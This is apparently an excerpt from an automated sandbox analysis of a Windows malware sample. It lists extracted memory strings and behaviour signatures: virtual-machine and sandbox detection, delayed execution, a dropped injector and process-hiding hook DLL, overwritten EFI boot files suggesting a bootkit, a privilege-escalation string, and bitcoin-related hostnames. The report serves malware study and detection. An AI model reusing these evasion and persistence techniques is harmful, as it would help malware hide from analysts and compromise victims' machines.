            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEF6ONLRKHUY.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEF6ONLRKHUY.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
            Source: csrss.exeBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 600Thread sleep time: -82000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6948Thread sleep time: -210000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 1756Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: VBoxGuestJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: vmciJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: HGFSJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,34_2_00007FF6A00B5C10
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: vmusrvc.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: csrss.exeBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: qemuvirtual
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: smss.execsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exedllhost.exesvchost.exef6onlrkhuy.exef6onlrkhuy.exevmci$
            Source: csrss.exeBinary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: csrss.exeBinary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
            Source: csrss.exeBinary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
            Source: csrss.exeBinary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: CoCreateInstanceConnectServerkernel32.dllGetUserDefaultLCIDoleaut32.dllExecQueryvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exesmartscreen.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSgrmBroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exevgauthservice.exevgauthservice.exevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exef6oNLRKHUy.exeTrustedInstaller.exetrustedinstaller.exef6oNLRKHUy.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exebackgroundTaskHost.exebackgroundtaskhost.exeb
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesgrmbroker.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: f6oNLRKHUy.exe, 00000003.00000002.372398606.00000000118FE000.00000004.00000001.sdmpBinary or memory string: xennet6xensvcxenvdb
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: GPU1ZSPWGFTCloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: systemvboxtray.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
            Source: csrss.exeBinary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
            Source: csrss.exeBinary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
            Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: main.isRunningInsideVMWare
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
